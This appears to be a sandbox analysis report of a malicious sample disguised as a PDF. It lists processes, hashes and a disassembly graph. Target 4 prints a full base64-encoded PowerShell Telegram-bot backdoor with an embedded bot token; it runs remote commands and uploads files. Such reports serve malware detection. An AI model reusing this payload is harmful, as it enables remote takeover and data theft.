TAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAkAHMAbABlAGUAcABUAGkAbQBlAA0ACgB9AA=='"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:03:54:59
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:03:55:02
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\file.pdf"
                                                                                  Imagebase:0x7ff6bc1b0000
                                                                                  File size:5'641'176 bytes
                                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:03:55:02
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAVQBSAEkAIAA+ACAAJABuAHUAbABsAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABJAG4AdgBvAGsAZQAtAEIAbwB0AEQAbwB3AG4AbABvAGEAZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQARgBpAGwAZQBQAGEAdABoAA0ACgAgACAAIAAgACkADQAKACAAIAAgACAAQQBkAGQALQB0AHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAA0ACgAgACAAIAAgACQARgBpAGUAbABkAE4AYQBtAGUAIAA9ACAAJwBkAG8AYwB1AG0AZQBuAHQAJwANAAoAIAAgACAAIAAkAGgAdAB0AHAAQwBsAGkAZQBuAHQASABhAG4AZABsAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAALgBIAHQAdABwAEMAbABpAGUAbgB0AEgAYQBuAGQAbABlAHIADQAKACAAIAAgACAAJABoAHQAdABwAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcAAuAEgAdAB0AHAAYwBsAGkAZQBuAHQAIAAkAGgAdAB0AHAAQwBsAGkAZQBuAHQASABhAG4AZABsAGUAcgANAAoADQAKACAAIAAgACAAJABGAGkAbABlAFMAdAByAGUAYQBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAFMAdAByAGUAYQBtAF0AOgA6AG4AZQB3ACgAJABGAGkAbABlAFAAYQB0AGgALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE0AbwBkAGUAXQA6ADoATwBwAGUAbgApAA0ACgAgACAAIAAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAC4ASABlAGEAZABlAHIAcwAuAEMAbwBuAHQAZQBuAHQARABpAHMAcABvAHMAaQB0AGkAbwBuAEgAZQBhAGQAZQByAFYAYQBsAHUAZQBdADoAOgBuAGUAdwAoACcAZgBvAHIAbQAtAGQAYQB0AGEAJwApAA0ACgAgACAAIAAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgAuAE4AYQBtAGUAIAA9ACAAJABGAGkAZQBsAGQATgBhAG0AZQANAAoAIAAgACAAIAAkAEYAaQBsAGUASABlAGEAZABlAHIALgBGAGkAbABlAE4AYQBtAGUAIAA9ACAAKABTAHAAbABpAHQALQBQAGEAdABoACAAJABGAGkAbABlAFAAYQB0AGgAIAAtAGwAZQBhAGYAKQANAAoAIAAgACAAIAAkAEYAaQBsAGUAQwBvAG4AdABlAG4AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAC4AUwB0AHIAZQBhAG0AQwBvAG4AdABlAG4AdABdADoAOgBuAGUAdwAoACQARgBpAGwAZQBTAHQAcgBlAGEAbQApAA0ACgAgACAAIAAgACQARgBpAGwAZQBDAG8AbgB0AGUAbgB0AC4ASABlAGEAZABlAHIAcwAuAEMAbwBuAHQAZQBuAHQARABpAHMAcABvAHMAaQB0AGkAbwBuACAAPQAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgANAAoAIAAgACAAIAAkAEYAaQBsAGUAQwBvAG4AdABlAG4AdAAuAEgAZQBhAGQAZQByAHMALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFcAZQBiAC4ATQBpAG0AZQBNAGEAcABwAGkAbgBnAF0AOgA6AEcAZQB0AE0AaQBtAGUATQBhAHAAcABpAG4AZwAoACQARgBpAGwAZQBQAGEAdABoACkAIAANAAoAIAAgACAAIAANAAoAIAAgACAAIAAkAE0AdQBsAHQAaQBwAGEAcgB0AEMAbwBuAHQAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcAAuAE0AdQBsAHQAaQBwAGEAcgB0AEYAbwByAG0ARABhAHQAYQBDAG8AbgB0AGUAbgB0AF0AOgA6AG4AZQB3ACgAKQANAAoAIAAgACAAIAAkAE0AdQBsAHQAaQBwAGEAcgB0AEMAbwBuAHQAZQBuAHQALgBBAGQAZAAoACQARgBpAGwAZQBDAG8AbgB0AGUAbgB0ACkADQAKACAAIAAgACAADQAKACAAIAAgACAAJABoAHQAdABwAEMAbABpAGUAbgB0AC4AUABvAHMAdABBAHMAeQBuAGMAKAAiACQAVQBSAEwALwBzAGUAbgBkAEQAbwBjAHUAbQBlAG4AdAA/AGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AIgAsACAAJABNAHUAbAB0AGkAcABhAHIAdABDAG8AbgB0AGUAbgB0ACkAIAA+ACAAJABuAHUAbABsAA0ACgB9AA0ACgANAAoAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgACQAaQBuAE0AZQBzAHMAYQBnAGUAIAA9ACAASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBNAGUAdABoAG8AZAAgAEcAZQB0ACAALQBVAHIAaQAgACgAJABVAFIATAAgACsAJwAvAGcAZQB0AFUAcABkAGEAdABlAHMAPwBvAGYAZgBzAGUAdAA9ACcAIAArACAAKAAkAGwAYQBzAHQASQBEACAAKwAgADEAKQApACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAYwBhAHQAYwBoACAAewANAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgACQAKABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGEAeABpAG0AdQBtACAAMQAwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAGMAbwBuAHQAaQBuAHUAZQANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACQAaQBuAE0AZQBzAHMAYQBnAGUALgByAGUAcwB1AGwAdAAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAB1AHAAZABhAHQAZQBpAGQAIAA9ACAAJABfAC4AdQBwAGQAYQB0AGUAXwBpAGQADQAKACAAIAAgACAAIAAgACAAIAAkAGYAcgBvAG0AIAA9ACAAJABfAC4AbQBlAHMAcwBhAGcAZQAuAGYAcgBvAG0ALgBpAGQADQAKACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAXwAuAG0AZQBzAHMAYQBnAGUALgB0AGUAeAB0ACkAKQANAAoADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADYAKQAgAC0AZQBxACAAIgAvAHMAbABlAGUAcAAiACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIABbAGkAbgB0AF0AJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA3ACkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADQAKQAgAC0AZQBxACAAIgAvAGMAbQBkACIAKQB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA1ACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AQgBvAHQAQwBtAGQAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAGMAbwBtAG0AYQBuAGQADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADkAKQAgAC0AZQBxACAAIgAvAGQAbwB3AG4AbABvAGEAZAAiACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABGAGkAbABlAFAAYQB0AGgAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAxADAAKQAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAEIAbwB0AEQAbwB3AG4AbABvAGEAZAAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABGAGkAbABlAFAAYQB0AGgAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABjAG0AZAAgAD0AIAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADEALAAgADUAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABpAGQAZQBuAHQAaQBmAGkAZQByACAALQBlAHEAIAAkAGMAbQBkACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA3ACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAC0AYwBvAG0AbQBhAG4AZAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAUwBMAEUARQBQACIADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAJAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAAxADAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAkAHMAbABlAGUAcABUAGkAbQBlAA0ACgB9AA==
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:03:55:05
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                  Imagebase:0x7ff74bb60000
                                                                                  File size:3'581'912 bytes
                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:03:55:06
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                  Imagebase:0x7ff6eef20000
                                                                                  File size:55'320 bytes
                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:03:55:06
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1636,i,11664794565421518283,13165857320494331314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                  Imagebase:0x7ff74bb60000
                                                                                  File size:3'581'912 bytes
                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:7.9%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:8.2%
                                                                                    Total number of Nodes:1378
                                                                                    Total number of Limit Nodes:33
                                                                                    execution_graph 16415 7ff767f023fc 16418 7ff767f021c8 16415->16418 16425 7ff767efff30 EnterCriticalSection 16418->16425 14836 7ff767f015d0 14837 7ff767f015e9 14836->14837 14846 7ff767f015e5 14836->14846 14838 7ff767f0b8d8 66 API calls 14837->14838 14839 7ff767f015ee 14838->14839 14851 7ff767f0bcc4 GetEnvironmentStringsW 14839->14851 14842 7ff767f015fb 14845 7ff767f05ce8 __free_lconv_mon 11 API calls 14842->14845 14843 7ff767f01607 14871 7ff767f01644 14843->14871 14845->14846 14848 7ff767f05ce8 __free_lconv_mon 11 API calls 14849 7ff767f0162e 14848->14849 14850 7ff767f05ce8 __free_lconv_mon 11 API calls 14849->14850 14850->14846 14852 7ff767f015f3 14851->14852 14853 7ff767f0bcf4 14851->14853 14852->14842 14852->14843 14854 7ff767f0a370 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 14853->14854 14855 7ff767f0bd45 14854->14855 14856 7ff767f0bd4c FreeEnvironmentStringsW 14855->14856 14857 7ff767f08e50 std::_Locinfo::_Locinfo_ctor 12 API calls 14855->14857 14856->14852 14858 7ff767f0bd5f 14857->14858 14859 7ff767f0bd67 14858->14859 14860 7ff767f0bd70 14858->14860 14861 7ff767f05ce8 __free_lconv_mon 11 API calls 14859->14861 14862 7ff767f0a370 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 14860->14862 14863 7ff767f0bd6e 14861->14863 14864 7ff767f0bd93 14862->14864 14863->14856 14865 7ff767f0bd97 14864->14865 14866 7ff767f0bda1 14864->14866 14867 7ff767f05ce8 __free_lconv_mon 11 API calls 14865->14867 14868 7ff767f05ce8 __free_lconv_mon 11 API calls 14866->14868 14869 7ff767f0bd9f FreeEnvironmentStringsW 14867->14869 14868->14869 14869->14852 14872 7ff767f01669 14871->14872 14873 7ff767f062d4 _set_fmode 11 API calls 14872->14873 14879 7ff767f0169f 14873->14879 14874 7ff767f05ce8 __free_lconv_mon 11 API calls 14875 7ff767f0160f 14874->14875 14875->14848 14876 7ff767f0171a 14877 7ff767f05ce8 __free_lconv_mon 11 API calls 14876->14877 14877->14875 14878 7ff767f062d4 _set_fmode 11 API calls 14878->14879 14879->14876 14879->14878 14880 7ff767f01709 14879->14880 14882 7ff767f039e0 __std_exception_copy 37 API calls 14879->14882 14885 7ff767f0173f 14879->14885 14886 7ff767f05ce8 __free_lconv_mon 11 API calls 14879->14886 14887 7ff767f016a7 14879->14887 14890 7ff767f01754 14880->14890 14882->14879 14884 7ff767f05ce8 __free_lconv_mon 11 API calls 14884->14887 14888 7ff767eff778 _invalid_parameter_noinfo_noreturn 17 API calls 14885->14888 14886->14879 14887->14874 14889 7ff767f01752 14888->14889 14892 7ff767f01759 14890->14892 14895 7ff767f01711 14890->14895 14891 7ff767f01782 14894 7ff767f05ce8 __free_lconv_mon 11 API calls 14891->14894 14892->14891 14893 7ff767f05ce8 __free_lconv_mon 11 API calls 14892->14893 14893->14892 14894->14895 14895->14884 14944 7ff767ef38d0 14945 7ff767ef38e8 14944->14945 14949 7ff767ef38f4 BuildCatchObjectHelperInternal 14944->14949 14946 7ff767ef3905 BuildCatchObjectHelperInternal 14947 7ff767ef3a3e 14947->14946 14950 7ff767efef38 _fread_nolock 53 API calls 14947->14950 14949->14946 14949->14947 14951 7ff767efef38 14949->14951 14950->14946 14954 7ff767efef58 14951->14954 14955 7ff767efef82 14954->14955 14966 7ff767efef50 14954->14966 14956 7ff767efefce 14955->14956 14958 7ff767efef91 __scrt_get_show_window_mode 14955->14958 14955->14966 14967 7ff767efe43c EnterCriticalSection 14956->14967 14959 7ff767f006a8 _set_fmode 11 API calls 14958->14959 14961 7ff767efefa6 14959->14961 14963 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14961->14963 14963->14966 14966->14949 15076 7ff767ef3ec0 15077 7ff767ef3ee6 15076->15077 15081 7ff767ef3eed 15076->15081 15078 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 15077->15078 15079 7ff767ef4048 15078->15079 15081->15077 15082 7ff767ef3fe7 15081->15082 15083 7ff767ef3f73 15081->15083 15082->15077 15084 7ff767efe7c4 76 API calls 15082->15084 15083->15077 15085 7ff767efdac8 15083->15085 15084->15077 15086 7ff767efdaf8 15085->15086 15089 7ff767efd8f8 15086->15089 15088 7ff767efdb11 15088->15077 15090 7ff767efd953 15089->15090 15091 7ff767efd91e 15089->15091 15107 7ff767efe43c EnterCriticalSection 15090->15107 15093 7ff767eff65c _invalid_parameter_noinfo_noreturn 37 API calls 15091->15093 15094 7ff767efd940 15093->15094 15094->15088 16468 7ff767f047ac 16469 7ff767f047b1 16468->16469 16470 7ff767f047c6 16468->16470 16474 7ff767f047cc 16469->16474 16475 7ff767f0480e 16474->16475 16476 7ff767f04816 16474->16476 16477 7ff767f05ce8 __free_lconv_mon 11 API calls 16475->16477 16478 7ff767f05ce8 __free_lconv_mon 11 API calls 16476->16478 16477->16476 16479 7ff767f04823 16478->16479 16480 7ff767f05ce8 __free_lconv_mon 11 API calls 16479->16480 16481 7ff767f04830 16480->16481 16482 7ff767f05ce8 __free_lconv_mon 11 API calls 16481->16482 16483 7ff767f0483d 16482->16483 16484 7ff767f05ce8 __free_lconv_mon 11 API calls 16483->16484 16485 7ff767f0484a 16484->16485 16486 7ff767f05ce8 __free_lconv_mon 11 API calls 16485->16486 16487 7ff767f04857 16486->16487 16488 7ff767f05ce8 __free_lconv_mon 11 API calls 16487->16488 16489 7ff767f04864 16488->16489 16490 7ff767f05ce8 __free_lconv_mon 11 API calls 16489->16490 16491 7ff767f04871 16490->16491 16492 7ff767f05ce8 __free_lconv_mon 11 API calls 16491->16492 16493 7ff767f04881 16492->16493 16494 7ff767f05ce8 __free_lconv_mon 11 API calls 16493->16494 16495 7ff767f04891 16494->16495 16500 7ff767f0467c 16495->16500 16514 7ff767efff30 EnterCriticalSection 16500->16514 16561 7ff767efe398 16562 7ff767efe3a3 16561->16562 16570 7ff767f06cac 16562->16570 16583 7ff767efff30 EnterCriticalSection 16570->16583 15472 7ff767ef3680 15473 7ff767ef36b3 15472->15473 15474 7ff767ef370b 15473->15474 15475 7ff767ef4b30 76 API calls 15473->15475 15477 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 15474->15477 15476 7ff767ef36d6 15475->15476 15476->15474 15479 7ff767ef36f6 15476->15479 15482 7ff767eff270 15476->15482 15478 7ff767ef3779 15477->15478 15479->15474 15486 7ff767efe868 15479->15486 15483 7ff767eff2a0 15482->15483 15484 7ff767eff000 73 API calls 15483->15484 15485 7ff767eff2b9 15484->15485 15485->15479 15487 7ff767efe891 15486->15487 15488 7ff767efe87c 15486->15488 15487->15488 15490 7ff767efe896 15487->15490 15489 7ff767f006a8 _set_fmode 11 API calls 15488->15489 15491 7ff767efe881 15489->15491 15495 7ff767f073a8 15490->15495 15493 7ff767eff728 _invalid_parameter_noinfo 37 API calls 15491->15493 15494 7ff767efe88c 15493->15494 15494->15474 15496 7ff767f073d8 15495->15496 15499 7ff767f06eb4 15496->15499 15498 7ff767f073f1 15498->15494 15500 7ff767f06ecf 15499->15500 15501 7ff767f06efe 15499->15501 15502 7ff767eff65c _invalid_parameter_noinfo_noreturn 37 API calls 15500->15502 15509 7ff767efe43c EnterCriticalSection 15501->15509 15508 7ff767f06eef 15502->15508 